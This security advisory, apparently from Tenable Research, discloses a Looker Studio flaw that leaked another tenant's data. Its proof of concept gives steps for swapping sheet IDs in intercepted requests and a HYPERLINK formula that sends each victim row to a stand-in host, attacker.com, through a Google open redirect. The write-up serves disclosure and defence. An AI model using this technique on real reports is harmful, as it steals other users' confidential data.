Google Cloud Platform (GCP) Cross-Tenant Data Sources Leak With Hyperlinks in Looker Studio

Tenable Research has identified and responsibly disclosed a vulnerability in Google's Looker Studio, which could allow an attacker to exfiltrate a victim's sensitive data through a combination of calculated fields, malicious hyperlinks, and an open redirect.

This vulnerability leveraged several features to bypass intended security controls. An attacker could create a report and attach a victim's data source using "Viewer's credentials". By using a calculated field, the attacker could then embed a malicious hyperlink into a table. The HYPERLINK function was configured to append data from each row of the victim's data source to the URL of an attacker-controlled server.

To bypass Google's redirect warning, the attack utilized a legitimate Google-owned open redirect on a subdomain of google.com. When the victim clicked the malicious hyperlink in the report, they would be silently redirected through the Google URL to the attacker's server, leaking their data in the process. This allowed an attacker to collect sensitive information on a row-by-row basis.

Proof of Concept

Set up  a mock data source for the getColumns HTTP request:

1. Create a Google Sheet spreadsheet. In this example we will name it “Attacker’s spreadsheet.”
2. Populate all columns from A-Z with random data. 

Set up the attacker’s report:

3. Create a report.
4. Choose a connector, for example, Google Sheets.
5. Choose the specific data source we just created, “Attacker’s spreadsheet.”
6. Remove the check from the checkbox “Use first row as headers” so you can reference columns by A-Z.
7. Proxy the HTTP requests, and forward the requests including the getColumns request.
8. Intercept the createBlockDatasource and publishDatasource HTTP requests, and change the ID of the sheet from the attacker’s to the victim’s sheet.
9. Click Resource → Manage added data sources → edit the added Google Sheet data source, and change the credentials to Viewer Credentials.
10. Add a chart to the report, preferably a table, by pressing “Add a chart” and choosing a Table.
11. Choose the victim’s data source to be attached to the table chart, the end result should be “No Data Set Access.”
12. Add a calculated field by pressing the table → “Add dimension” → “Add calculated field” and paste the following formula:

HYPERLINK(

  CONCAT(

"https://apis.google.com/additnow/l?applicationid=90409726456&__ls=ogb&__lu=https%3A%2F%2Fattacker.com%2F%3F", A,

    "%26columnB%3D", B,

    "%26columnC%3D", C,

    "%26columnD%3D", D,

    "%26columnE%3D", E,

    "%26columnF%3D", F,

    "%26columnG%3D", G,

    "%26columnH%3D", H,

    "%26columnI%3D", I,

    "%26columnJ%3D", J,

    "%26columnK%3D", K,

    "%26columnL%3D", L,

    "%26columnM%3D", M,

    "%26columnN%3D", N,

    "%26columnO%3D", O,

    "%26columnP%3D", P,

    "%26columnQ%3D", Q,

    "%26columnR%3D", R

  ),

  "Click to open report"

)

.

13. Share the report with the victim, and uncheck the “Notify” checkbox.
14. (Optional) Make the report embeddable by clicking File → Embed report → check “Enable Embedding” and press Done.
15. (Optional) Host a website and iframe the report with the granted iframe when allowing embedding, for example:

`<iframe width="600" height="450" src="https://lookerstudio.google.com/embed/reporting/<attacker’s-report-id>/page/MK5LF" frameborder="0" style="border:0" allowfullscreen sandbox="allow-storage-access-by-user-activation allow-scripts allow-same-origin allow-popups allow-popups-to-escape-sandbox"></iframe>`

16. As the victim, click on the hyperlink embedded in the report on the attacker’s website, and the data will be leaked